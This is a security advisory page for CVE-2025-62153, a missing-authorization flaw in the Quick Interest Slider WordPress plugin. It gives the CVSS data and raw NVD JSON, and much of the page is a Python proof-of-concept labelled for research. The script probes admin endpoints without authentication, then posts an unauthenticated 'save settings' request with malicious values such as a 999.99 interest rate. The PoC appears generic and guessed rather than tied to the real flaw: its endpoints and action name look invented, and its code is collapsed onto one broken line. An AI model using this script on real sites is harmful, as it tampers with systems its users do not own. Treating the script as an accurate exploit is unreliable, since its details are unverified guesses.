Security Vulnerability Report
中文
CVE-2025-62153 CVSS 5.3 MEDIUM

CVE-2025-62153

Published: 2025-12-09 16:18:02
Last Modified: 2026-04-27 18:16:26

Description

Missing Authorization vulnerability in Graham Quick Interest Slider quick-interest-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quick Interest Slider: from n/a through <= 3.1.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Quick Interest Slider <= 3.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62153 PoC - Missing Authorization in Quick Interest Slider # Target: WordPress site with Quick Interest Slider plugin <= 3.1.7 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-62153 Missing Authorization vulnerability in Quick Interest Slider """ # Try to access admin functionality without authentication endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-admin/admin.php?page=quick-interest-slider", f"{TARGET_URL}/wp-json/wp/v2/quick-interest-slider" ] for endpoint in endpoints: try: # Send request without authentication response = requests.get(endpoint, timeout=10) # Check if we can access admin functionality if response.status_code == 200: # Check for sensitive data exposure if "quick_interest" in response.text.lower() or "slider" in response.text.lower(): print(f"[!] Potential vulnerability found at: {endpoint}") print(f"[+] Status Code: {response.status_code}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False def exploit_configuration_access(): """ Exploit the missing authorization to access plugin configuration """ # Crafted request to access plugin settings without auth exploit_payload = { 'action': 'quick_interest_slider_save_settings', 'security_token': '', # No token required due to missing auth check 'interest_rate': '999.99', # Malicious configuration 'slider_config': 'malicious_data' } try: response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_payload, timeout=10 ) if response.status_code == 200: print("[!] Successfully sent configuration update request") print(f"[+] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": print("CVE-2025-62153 Quick Interest Slider - Missing Authorization PoC") print("=" * 60) check_vulnerability() print("\n[*] Attempting exploitation...") exploit_configuration_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62153", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:01.717", "lastModified": "2026-04-27T18:16:26.320", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Graham Quick Interest Slider quick-interest-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quick Interest Slider: from n/a through <= 3.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/quick-interest-slider/vulnerability/wordpress-quick-interest-slider-plugin-3-1-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}